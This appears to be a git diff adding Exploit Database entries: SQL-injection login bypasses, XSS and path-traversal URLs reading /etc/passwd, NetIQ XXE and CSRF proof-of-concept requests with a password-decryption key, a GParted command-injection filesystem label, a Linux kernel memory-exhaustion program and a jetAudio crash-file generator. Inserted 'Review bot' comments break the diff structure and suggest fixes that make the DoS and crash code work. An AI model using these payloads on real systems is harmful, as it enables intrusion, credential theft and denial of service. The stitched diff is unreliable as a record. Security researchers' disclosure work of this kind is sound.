diff --git a/files.csv b/files.csv
index 46262adde..edd271cd5 100755
--- a/files.csv
+++ b/files.csv
@@ -32046,3 +32046,17 @@ id,file,description,date,author,platform,type,port
 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082
 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000
+35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability",2014-12-23,LiquidWorm,windows,local,0
+35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash POC",2014-12-23,"Drozdova Liudmila",windows,dos,0
+35593,platforms/windows/webapps/35593.txt,"SysAid Server Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0
+35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443
+35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0
+35596,platforms/php/webapps/35596.txt,"eGroupware 1.8.1 'test.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0
+35597,platforms/hardware/remote/35597.txt,"Fiberhome HG-110 Cross Site Scripting and Directory Traversal Vulnerabilities",2011-04-08,Zerial,hardware,remote,0
+35598,platforms/php/webapps/35598.txt,"1024cms 1.1.0 beta Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure and Demetris Papapetrou",php,webapps,0
+35599,platforms/asp/webapps/35599.txt,"Dimac CMS 1.3 XS 'default.asp' SQL Injection Vulnerability",2011-04-11,KedAns-Dz,asp,webapps,0
+35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x 'inotify_init1()' Double Free Local Denial of Service Vulnerability",2011-04-11,anonymous,linux,dos,0
+35601,platforms/php/webapps/35601.txt,"Etki Video PRO 2.0 izle.asp id Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0
+35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0
+35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0
+35604,platforms/php/webapps/35604.txt,"eForum 1.1 '/eforum.php' Arbitrary File Upload Vulnerability",2011-04-09,QSecure,php,webapps,0
diff --git a/platforms/asp/webapps/35599.txt b/platforms/asp/webapps/35599.txt
new file mode 100755
index 000000000..c1cc9c183
--- /dev/null
+++ b/platforms/asp/webapps/35599.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/47291/info
+
+Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Dimac CMS XS 1.3 is vulnerable; other versions may also be affected.
+
+The following example URI and data are available:
+
+http://www.example.com/[path]/CMSadmin/default.asp
+
+Username : admin
+Password : 1'or'1'='1
\ No newline at end of file
diff --git a/platforms/hardware/remote/35597.txt b/platforms/hardware/remote/35597.txt
new file mode 100755
index 000000000..512bbe950
--- /dev/null
+++ b/platforms/hardware/remote/35597.txt
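Review bot: The new rows for 35601 and 35602 carry `php` in the platform column and are filed under `platforms/php/webapps/`, yet their titles name ASP pages (`izle.asp`, `kategori.asp`), while the sibling 35599 row for `default.asp` is recorded as `asp`. Anyone filtering this index by platform to scope an ASP-only asset review would miss these two entries. Unless the php value is deliberate, the platform field should read `asp`, with the file path moved to match.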
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/47277/info
+
+Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks.
+
+Fiberhome HG-110 firmware 1.0.0 is vulnerable other versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns
+
+Local File Include and Directory/Path Traversal:
+
+-
+http://www.example.com/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns
+
diff --git a/platforms/jsp/webapps/35594.txt b/platforms/jsp/webapps/35594.txt
new file mode 100755
index 000000000..c1a50569d
--- /dev/null
+++ b/platforms/jsp/webapps/35594.txt
@@ -0,0 +1,213 @@
+SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
+=======================================================================
+ title: Multiple high risk vulnerabilities
+ product: NetIQ Access Manager
+vulnerable version: 4.0 SP1
+ fixed version: 4.0 SP1 Hot Fix 3
+ CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216,
+ CVE-2014-5217
+ impact: High
+ homepage: https://www.netiq.com/
+ found: 2014-10-29
+ by: W. Ettlinger
+ SEC Consult Vulnerability Lab
+ https://www.sec-consult.com
+=======================================================================
+
+Vendor/product description:
+---------------------------
+"As demands for secure web access expand and delivery becomes increasingly
+complex, organizations face some formidable challenges. Access Manager
+provides a simple yet secure and scalable solution that can handle all your
+web access needs—both internal as well as in the cloud."
+
+URL: https://www.netiq.com/products/access-manager/
+
+
+Business recommendation:
+------------------------
+An attacker without an account on the NetIQ Access Manager is be able to gain
+administrative access by combining different attack vectors. Though this host
+may not always be accessible from a public network, an attacker is still able
+to compromise the system when directly targeting administrative users.
+
+Because the NetIQ Access Manager is used for authentication, an attacker
+compromising the system can use it to gain access to other systems.
+
+SEC Consult highly recommends that this software is not used until a full
+security review has been performed and all issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
+Authenticated administrative users can download arbitrary files from the Access
+Manager administration interface as the user "novlwww".
+
+The vendor provided the following KB link:
+https://www.novell.com/support/kb/doc.php?id=7015993
+
+
+2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
+Multiple reflected cross site scripting vulnerabilities were found. These
+allow effective attacks of administrative and SSLVPN sessions.
+
+The vendor provided the following KB link:
+https://www.novell.com/support/kb/doc.php?id=7015994
+
+
+3) Persistent Site Scripting (XSS, CVE-2014-5216)
+A persistent cross site scripting vulnerability was found. This allows
+effective attacks of administrative and SSLVPN sessions.
+
+The vendor provided the following KB link:
+https://www.novell.com/support/kb/doc.php?id=7015996
+
+
+4) Cross Site Request Forgery (CVE-2014-5217)
+The Access Manager administration interface does not have CSRF protection.
+
+The vendor provided the following KB link:
+https://www.novell.com/support/kb/doc.php?id=7015997
+
+
+5) Information Disclosure (CVE-2014-5215)
+Authenticated users of the administration interface can gain authentication
+information of internal administrative users.
+
+The vendor provided the following KB link:
+https://www.novell.com/support/kb/doc.php?id=7015995
+
+
+By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
+unauthenticated, non-admin user may gain full access to the system!
+
+
+Proof of concept:
+-----------------
+1) XML eXternal Entity Injection (XXE)
+As an example, the following URL demonstrates the retrieval of the /etc/passwd
+file as an authenticated administrative user:
+
+https://:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%0a]>%26include%3bfalse
+
+
+2) Reflected Cross Site Scripting (XSS)
+The following URLs demonstrate different reflected XSS flaws in the
+administration interface and the user interface.
+
+https://:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'
+
+https://:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
+
+https://:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E
+
+https:///nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
+
+https:///sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
+
+
+3) Persistent Site Scripting (XSS)
+The following URL injects a stored script on the auditing page:
+
+https://:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289
+
+
+4) Cross Site Request Forgery
+As an example, an attacker is able to change the administration password to
+'12345' by issuing a GET request in the context of an authenticated
+administrator. The old password is not necessary for this attack!
+
+https://:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345
+
+
+5) Information Disclosure
+The following URLs disclose several useful information to an authenticated
+account:
+
+https://:8443/roma/jsp/volsc/monitoring/dev_services.jsp
+https://:8443/roma/jsp/debug/debug.jsp
+
+The disclosed system properties:
+com.volera.vcdn.monitor.password
+com.volera.vcdn.alert.password
+com.volera.vcdn.sync.password
+com.volera.vcdn.scheduler.password
+com.volera.vcdn.publisher.password
+com.volera.vcdn.application.sc.scheduler.password
+com.volera.vcdn.health.password
+
+The static string "k~jd)*L2;93=Gjs" is XORed with these values in order
+to decrypt passwords of internally used service accounts.
+
+
+
+By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
+unauthenticated, non-admin user may gain full access to the system!
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerabilities have been verified to exist in the NetIQ Access Manager
+version 4.0 SP1, which was the most recent version at the time of discovery.
+
+
+Vendor contact timeline:
+------------------------
+2014-10-29: Contacting security@netiq.com, sending responsible disclosure
+ policy and PGP keys
+2014-10-29: Vendor redirects to security@novell.com, providing PGP keys
+ through Novell support page
+2014-10-30: Sending encrypted security advisory to Novell
+2014-10-30: Novell acknowledges the receipt of the advisory
+2014-12-16: Novell: the vulnerability fixes will be released tomorrow;
+ The CSRF vulnerability will not be fixed immediately
+ ("Since this can be done only after an authorized login");
+ two XSS vulnerabilities can not be exploited ("We could not
+ take advantage or retrieve any cookie info on the server
+ side - it looks like it's a client side cross scripting
+ attack.")
+2014-12-16: Explaining why those vulnerabilities can be exploited
+2014-12-17: Novell: Fix will be released tomorrow
+2014-12-17: Verifying release of advisory tomorrow
+2014-12-18: Novell: Advisory can be released
+2014-12-18: Coordinated release of security advisory
+
+
+Solution:
+---------
+Update to the latest available of Access Manager and implement workarounds
+mentioned in the KB articles by Novell linked above.
+
+
+Workaround:
+-----------
+For some vulnerabilities, Novell provides best practice recommendations in the
+URLs linked above.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
+
+Headquarter:
+Mooslackengasse 17, 1190 Vienna, Austria
+Phone: +43 1 8903043 0
+Fax: +43 1 8903043 15
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+Interested to work with the experts of SEC Consult?
+Write to career@sec-consult.com
+
+EOF W. Ettlinger / @2014
diff --git a/platforms/linux/dos/35600.c b/platforms/linux/dos/35600.c
new file mode 100755
index 000000000..ab5ef3786
--- /dev/null
+++ b/platforms/linux/dos/35600.c
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/47296/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
+
+#include
+#include
+
+int main(int argc, char *argv[])
+{
+ int fds[2];
+
+ /* Circumvent max inotify instances limit */
+ while (pipe(fds) != -1)
+ ;
+
+ while (1)
+ inotify_init();
+
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/linux/local/35595.txt b/platforms/linux/local/35595.txt
new file mode 100755
index 000000000..df450585c
--- /dev/null
+++ b/platforms/linux/local/35595.txt
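Review bot: Both `#include` directives in the new 35600.c are empty, so the file does not compile as committed; the header names were presumably dropped as angle-bracket markup when the text was imported. `pipe()` is declared in `<unistd.h>` and `inotify_init()` in `<sys/inotify.h>`, so the two lines should read `#include <unistd.h>` and `#include <sys/inotify.h>`. The five prose lines above them (the securityfocus reference and summary) are not in comment syntax either and need `/* … */` around them before a compiler accepts the file. The comment `Circumvent max inotify instances limit` does not say how exhausting the descriptor table relates to the instance limit; a sentence tying it to the `inotify_init1()` failure path named in the files.csv title would help a reader, and the header could state plainly that the program deliberately never releases the pipes or inotify instances it creates and does not terminate on its own.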
@@ -0,0 +1,123 @@
+SEC Consult Vulnerability Lab Security Advisory < 20141218-1 >
+=======================================================================
+ title: OS Command Execution
+ product: GParted - Gnome Partition Editor
+vulnerable version: <=0.14.1
+ fixed version: >=0.15.0,
+ <=0.14.1 with fix for CVE-2014-7208 applied
+ CVE number: CVE-2014-7208
+ impact: medium
+ homepage: http://gparted.org/
+ found: 2014-07
+ by: W. Ettlinger
+ SEC Consult Vulnerability Lab
+ https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+"GParted is a free partition editor for graphically managing your disk
+partitions.
+
+With GParted you can resize, copy, and move partitions without data
+loss, enabling you to:
+* Grow or shrink your C: drive
+* Create space for new operating systems
+* Attempt data rescue from lost partitions"
+
+URL: http://gparted.org/index.php
+
+
+Vulnerability overview/description:
+-----------------------------------
+Gparted <=0.14.1 does not properly sanitize strings before passing
+them as parameters to an OS command. Those commands are executed
+using root privileges.
+
+Parameters that are being used for OS commands in Gparted are normally
+determined by the user (e.g. disk labels, mount points). However, under
+certain circumstances, an attacker can use an external storage device to
+inject command parameters. These circumstances are met if for example an
+automounter uses a filesystem label as part of the mount path.
+
+Please note that GParted versions before 0.15 are still being used
+in distributions. E.g Debian Wheezy is vulnerable to this issue before
+applying the patches.
+
+
+Proof of concept:
+-----------------
+The following command creates a malicious filesystem.
+
+# mkfs.ext2 -L "\`reboot\`" /dev/sdXX
+
+When this filesystem is mounted by an automounter to a mountpoint
+containing the filesystem label and the user tries to unmount this filesystem
+using GParted, the system reboots.
+
+Vulnerable / tested versions:
+-----------------------------
+Gparted versions <=0.14.1 were found to be vulnerable.
+
+
+Vendor contact timeline:
+------------------------
+2014-10-29: Contacting maintainer (Curtis Gedak) through
+ gedakc AT users DOT sf DOT net
+2014-10-29: Initial response from maintainer offering encryption
+2014-10-30: Sending encrypted advisory
+2014-10-30: Maintainer confirms the behaviour, will be investigated
+ further
+2014-11-04: Maintainer sends initial patches
+2014-11-05: Giving a few notes on the patches
+2014-11-05: Maintainer clarifies a few concerns with the patches;
+ Forwards patches to Mike Fleetwood for review
+2014-11-08: Review shows that the patches cause functional
+ problems; proposes further procedure
+2014-11-08: Maintainer proposes a different patching approach
+2014-11-08: Reviewer shows concerns with this approach, opens
+ a security bug (1171909) with Fedora (in accordance with
+ their Security Tracking Bugs procedure);
+ Red Hat creates tracking bug 1172549
+2014-11-15: New patches for several versions
+2014-11-23: Maintainer sends vulnerability information to Debian
+2014-11-29: Debian Security Team responds, asks for embargo date and
+ CVE number
+2014-11-30: Release date set to 2014-12-18
+2014-12-11: Mailing list linux-distros AT vs DOT openwall DOT org informed
+2014-12-11: Writing that embargo may be lifted, SEC Consult will release
+ advisory on 2014-12-18
+2014-12-18: Coordinated release of security advisory
+
+
+Solution:
+---------
+Update GParted to version >= 0.15.0 or apply security patches for
+CVE-2014-7208.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
+
+Headquarter:
+Mooslackengasse 17, 1190 Vienna, Austria
+Phone: +43 1 8903043 0
+Fax: +43 1 8903043 15
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+Interested to work with the experts of SEC Consult?
+Write to career@sec-consult.com
+
+EOF W. Ettlinger / @2014
diff --git a/platforms/php/webapps/35596.txt b/platforms/php/webapps/35596.txt
new file mode 100755
index 000000000..2c980fa6a
--- /dev/null
+++ b/platforms/php/webapps/35596.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47273/info
+
+eGroupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+eGroupware 1.8.001 is vulnerable; other versions may also be affected.
+
+http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35598.txt b/platforms/php/webapps/35598.txt
new file mode 100755
index 000000000..eecfdb7d8
--- /dev/null
+++ b/platforms/php/webapps/35598.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/47282/info
+
+1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information.
+
+1024cms 1.1.0 beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
+http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
+http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
+http://www.example.com/index.php?act=../../../../../../etc/passwd%00
+http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
+http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
+http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
+http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
+http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
+http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
+
diff --git a/platforms/php/webapps/35601.txt b/platforms/php/webapps/35601.txt
new file mode 100755
index 000000000..69c317315
--- /dev/null
+++ b/platforms/php/webapps/35601.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47298/info
+
+Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Etki Video Pro 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/izle.asp?id=254 [SQL Injection]
\ No newline at end of file
diff --git a/platforms/php/webapps/35602.txt b/platforms/php/webapps/35602.txt
new file mode 100755
index 000000000..25eeb504a
--- /dev/null
+++ b/platforms/php/webapps/35602.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47298/info
+
+Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Etki Video Pro 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection]
\ No newline at end of file
diff --git a/platforms/php/webapps/35603.txt b/platforms/php/webapps/35603.txt
new file mode 100755
index 000000000..dc20e0ee2
--- /dev/null
+++ b/platforms/php/webapps/35603.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47299/info
+
+Live Wire for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
+
+Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.
+
+Live Wire for Wordpress 2.3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
+
+http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=jpg
+
+http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1
\ No newline at end of file
diff --git a/platforms/php/webapps/35604.txt b/platforms/php/webapps/35604.txt
new file mode 100755
index 000000000..f6af6fed0
--- /dev/null
+++ b/platforms/php/webapps/35604.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/47309/info
+
+eForum is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+
+eForum 1.1 is vulnerable; other versions may also be affected.
+
+if (isset($_FILES)) { //upload attachments
+ ...snip...
+ $invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess');
+ $uploaddir = $eforum->path.'/upload';
+ $upfiles = $_FILES['efattachment'];
+ foreach ($upfiles['name'] as $idx => $upname) {
+ if ($upname != '') {
+ $source = $upfiles['tmp_name'][$idx];
+ if (is_uploaded_file($source)) {
+ if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) { continue; }
\ No newline at end of file
diff --git a/platforms/windows/dos/35592.py b/platforms/windows/dos/35592.py
new file mode 100755
index 000000000..56047cdb0
--- /dev/null
+++ b/platforms/windows/dos/35592.py
@@ -0,0 +1,30 @@
+# Exploit Title : jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC
+# Product : jetAudio Basic
+# Date : 8.12.2014
+# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
+# Software Link : http://www.jetaudio.com/download/
+# Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions
+# Vendor Homepage : http://www.jetaudio.com/
+# Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
+# CVE : unknown at the moment
+#============================================================================================
+# Open created POC file (fault.mp3) with jetAudio
+# Details
+# (1e764.1df98): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9:
+# 0aa6b8b9 8b4804 mov ecx,dword ptr [eax+4] ds:002b:00000004=????????
+# 0:000:x86> kb
+# ChildEBP RetAddr Args to Child
+# WARNING: Stack unwind information not available. Following frames may be wrong.
+# 00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9
+#============================================================================================
+#!/usr/bin/python
+
+pocdata=("\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+mp3file = "fault.mp3"
+file = open(mp3file , "w")
+file.write(pocdata)
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/local/35590.txt b/platforms/windows/local/35590.txt
new file mode 100755
index 000000000..2153db5ad
--- /dev/null
+++ b/platforms/windows/local/35590.txt
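Review bot: The PoC bytes are written through a text-mode handle, `file = open(mp3file , "w")`, which only happens to produce the intended file under Python 2 because the payload contains no `\n`; under Python 3 the escapes above `\x7f` (`\xC9`, `\xFF`, `\x8E`) are re-encoded by the locale codec and the file on disk no longer matches the bytes in `pocdata`. Binary mode with a context manager fixes this and stops shadowing the builtin `file`: `with open(mp3file, "wb") as fh:` / `    fh.write(pocdata)` (with `pocdata` as a `b"..."` literal under Python 3). The `#!/usr/bin/python` shebang sits on line 23, after the comment header, so it has no effect; it belongs on line 1 if the script is meant to be run directly.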
@@ -0,0 +1,81 @@
+?
+BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability
+
+
+Vendor: BitRaider, LLC
+Product web page: http://www.bitraider.com
+Affected version: 1.3.3.4098
+
+Summary: BitRaider is a video game streaming and download service.
+
+Desc: BitRaider contains a flaw that leads to unauthorized privileges being gained.
+The issue is due to the program granting improper permissions with the 'F' flag for
+the 'Users' group, which makes the entire 'BitRaider' directory and its sub directories
+and files world-writable. This may allow a local attacker to change an executable file
+with a binary file and gain elevated privileges.
+
+List of executables affected:
+
+o====================================================================================================o
+| Binary/location | Description |
+| | |
+|=============================================================== ====================================|
+| C:\ProgramData\BitRaider\BRSptStub.exe | BitRaider Support Stub |
+|---------------------------------------------------------------|------------------------------------|
+| C:\ProgramData\BitRaider\common\BRException.exe | BitRaider Exception Handler |
+|---------------------------------------------------------------|------------------------------------|
+| C:\ProgramData\BitRaider\common\brwc.exe | BitRaider Distribution Web Client |
+|---------------------------------------------------------------|------------------------------------|
+| C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRSptSvc.exe | BitRaider Support Service Core |
+o====================================================================================================o
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5217
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5217.php
+
+
+17.12.2014
+
+----
+
+
+C:\Users\user>sc qc BRSptStub
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BRSptStub
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : "C:\ProgramData\BitRaider\BRSptStub.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : BitRaider Mini-Support Service Stub Loader
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\user>icacls "C:\ProgramData\BitRaider\BRSptStub.exe"
+C:\ProgramData\BitRaider\BRSptStub.exe BUILTIN\Users:(F) <--------------------------
+ NT AUTHORITY\SYSTEM:(F)
+ NT AUTHORITY\Authenticated Users:(F) <-------
+ BUILTIN\Administrators:(F)
+ NT AUTHORITY\INTERACTIVE:(F) <---------------
+ NT AUTHORITY\SERVICE:(F)
+ BUILTIN\Guests:(RX)
+ BUILTIN\Users:(I)(F) <-----------------------
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\Authenticated Users:(I)(F) <----
+ BUILTIN\Administrators:(I)(F)
+ NT AUTHORITY\INTERACTIVE:(I)(F) <------------
+ NT AUTHORITY\SERVICE:(I)(F)
+ BUILTIN\Guests:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\Users\user>
diff --git a/platforms/windows/webapps/35593.txt b/platforms/windows/webapps/35593.txt
new file mode 100755
index 000000000..9c357eeed
--- /dev/null
